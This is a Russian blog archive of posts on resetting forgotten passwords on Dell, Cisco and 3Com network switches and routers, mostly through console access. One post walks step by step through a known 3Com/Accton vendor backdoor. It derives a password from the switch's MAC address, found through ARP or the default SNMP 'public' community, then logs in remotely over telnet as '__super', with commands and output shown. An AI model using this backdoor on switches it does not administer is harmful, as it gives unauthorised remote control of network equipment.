Archive for recovery password

Сборс пароля на Dell 3024

// Июнь 27th, 2013 // No Comments » // Dell, harware, recovery password

powerconnect_3024-1

  1.  Подключиться к свитчу консолью, обычно 9600 8-n-1
  2.  Перезагрузить свитч питанием и удерживать клавишу Esc
  3.  Появится предупреждение о прерывании загрузки и приглашение вида «>»
  4. В консоли ввести: 
    EmergencyPasswordReset

    текст чувствителен к регистру!

  5. На подтверждение (y/n) ответить «X» (буква должна быть большая!)
  6. Если все верно сделано, в ответ будет фраза «the password has been disabled»
  7. Ввести «G» и нажать Enter, через минуту свитч сам перезагрузится с пустым паролем.
    на некоторых прошивках логин:пароль по умолчанию — root:switch

Взлом пароля на свитче 3Com SuperStack 3 backdoor

// Июнь 17th, 2013 // No Comments » // 3Com, hack, recovery password, switch

Оказалось, что линейка свитчей 3Com SuperStack 3 (а еще и некоторые свитчи Dell, SMC, Foundry и EdgeCore) вовсе не 3Com, а Accton. В документации к бэкдору упоминаются модели 3Com 3812, 3Com 3870, Edgecore ES4649 и Dell PowerConnect 5224, я проводил эксперимент на 3Com 3226 и 3250.

Суть бэкдора в том, что производитель заложил возможность авторизоваться на свитче зная его мак, который скриптом можно превратить в пароль, естественно все работает только в том случаи если у вас есть доступ к свитчу по telnet/ssh или http.

Для начала начала, нужно раздобыть мак адрес, если свитч находится в одной L2 сети с вами достаточно сделать ping и посмотреть ARP таблицу, например так:

C:\>ping 10.28.28.28
Обмен пакетами с 10.28.28.28 по 32 байт:
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Статистика Ping для 10.28.28.28:
    Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек

C:\>arp -a 10.28.28.28
Интерфейс: 10.28.28.28 --- 0x10005
  Адрес IP              Физический адрес      Тип
  10.28.28.28           00-12-a9-c9-ac-c0     динамический

Если свитч находится за маршрутизатором, можно попробовать достать его мак через протокол SNMP, если его администратор не отключил или не поменял комьюнити по умолчанию.

$ snmpget -v1 -c public 10.28.28.28 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:12:a9:c9:ac:c0

Скачать скрипт accton.pl
запустить скрипт и в качестве параметра указать мак, с разделителем «:»:

./accton.pl 00:12:a9:c9:ac:c0
BUvypQd!

вот собственно «BUvypQd!» и будет пароль.
Подключаемся к свитчю через telnet, вводим логин «__super» и пароль, который сгенерировал скрипт:

$ telnet 10.28.28.28
Trying 10.28.28.28...
Connected to 10.28.28.28.
Escape character is '^]'.
Login: __super
Password: BUvypQd!

Menu options: -----------3Com SuperStack 3 Switch 3226-------------------------
 bridge              - Administer bridge-wide parameters
 feature             - Administer system features
 gettingStarted      - Basic device configuration
 logout              - Logout of the Command Line Interface
 physicalInterface   - Administer physical interfaces
 protocol            - Administer protocols
 security            - Administer security
 system              - Administer system-level functions
 trafficManagement   - Administer traffic management

Type ? for help.
--------------------------------3Com 3226 (1)--------------------------------
Select menu option:

Ссылка на описание бэкдора http://www.exploit-db.com/exploits/14875/

Cisco Catalyst WS-C3550 сброс пароля (password recovery)

// Март 14th, 2013 // No Comments » // Cisco, recovery password, switch

WS-C3550-24PWR-SMI

  1. Подключить свитч консольным кабелем с настройками: 
    скорость: 9600 бит/с
бит данных: 8 (bits)
четность: нет (no parity)
стоповый бит: 1
управление потоком: нет
  2. Выключить питание свитча
  3. Зажать кнопку Mode и включить питание
  4. Когда индикатор System перестанет моргать — отпустить кнопку Mode, на экране должно быть приглашение:
    5. Xmodem file system is available.
The password-recovery mechanism is enabled.

The system has been interrupted prior to initializing the
flash filesystem.  The following commands will initialize
the flash filesystem, and finish loading the operating
system software:

    flash_init
    boot

switch:
  5. Ввести команду flash_init для инициализации Flash памяти: 
    switch: flash_init
Initializing Flash...
flashfs[0]: 91 files, 4 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 15998976
flashfs[0]: Bytes used: 8177152
flashfs[0]: Bytes available: 7821824
flashfs[0]: flashfs fsck took 19 seconds.
...done Initializing Flash.
Boot Sector Filesystem (bs:) installed, fsid: 3
  6. Ввести команду load_helper для инициализации помощника, будет загружен первый из доступных образов: 
    switch: load_helper
  7. Просмотреть содержимое Flash карты можно командой dir flash: 
    switch: dir flash:
Directory of flash:/

2    -rwx  320       <date>               system_env_vars
3    -rwx  2224      <date>               config-text.old
5    -rwx  4968676   <date>               c3550-i5k2l2q3-mz.121-22.EA4.bin
7    drwx  128       <date>               c3550-i5k2l2q3-mz.121-20.EA1
6    -rwx  30        <date>               env_vars
8    -rwx  2116      <date>               vlan.dat
9    -rwx  4650      <date>               config-text
11   -rwx  24        <date>               private-config.text
7821824 bytes available (8177152 bytes used)
  8. Переименовать или удалить старый конфиг: 
    switch: rename flash:config-text flash:config-text.backup
    switch: delete flash:config-text
Are you sure you want to delete "flash:config-text" (y/n)?y
File "flash:config-text" deleted
  9. Загрузить образ командой boot 
    switch: boot
Loading "flash:c3550-i5k2l2q3-mz.121-22.EA4.bin"...
#############################

Свитч загрузится с пустой конфигурацией:

         --- System Configuration Dialog ---

Would you like to enter the initial configuration dialog? [yes/no]: n



Press RETURN to get started!


Switch>

(далее…)

Сброс пароля 3Com SUPERSTACK 3 3226 3250

// Сентябрь 15th, 2012 // 1 Comment » // 3Com, recovery password, switch

3com 3226Подключится стандартным консольным кабелем, в параметра порта установить скорость 19200 (в некоторых инструкциях встречается еще загадочная скорость 18600).
Дождаться загрузки, на запрос логина ответить «recover» и пароль «recover». Появится надпись с предложением перезагрузить свитч и счетчиком обратного отсчета, в течении 30 секунд свитч нужно перезагрузить.
После перезагрузки, должно появится:

Enter the new password for the Administrator:

введите новый пароль для логина admin.

cisco router reset/recovering password сброс/восстановление пароля

// Июнь 7th, 2012 // No Comments » // Cisco, harware, recovery password

Подключить cisco консольным кабелем типа такого:

и подключится терминалом, стандартные настройки:

скорость: 9600 бит/с
бит данных: 8 (bits)
четность: нет (no parity)
стоповый бит: 1
управление потоком: нет

Перезагрузить роутер, достаточно выключить и включить питание.
В течении 60 секунд послать Break, в Windows HyperTerminal нажать Ctrl+Break (находится на клавише Pause), должны получить приглашение вида:

rommon 2>

Ввести confreg 0x142 команду включающую регистр сброса конфигурации:

rommon 2> confreg 0x142

Перезагрузить роутер:

rommon 2> reset

После сброса загрузка окончится на фразе:

--- System Configuration Dialog ---

ответить no
появится сообщение:

Press RETURN to get started!

нажать Return (он же Backspace), появится стандартное приглашение, войти в режим enable и посмотреть загрузочную конфигурацию show startup-config:

Router>
Router> enable
Router# show startup-config

В листинге конфигурации можно будет увидеть логин, пароль.
Но если вам не повезло и в конфигурации пароль пользователя и/или режима enable хранится в зашифрованном виде — можно установить новые. Для этого входим в режим конфигурации:

Router# configure terminal

и устанавливаем новый пароль режима enable:

Router(config)# enable secret %secretpassword%

и вернуть регистр в нормальное состояние:

Router(config)# config-register 0x2102

выйти из режима конфигурации нажать Ctrl+Z и сохранить изменения в конфигурации:

Router# copy running-config startup-config

перезагрузить роутер

Router# reload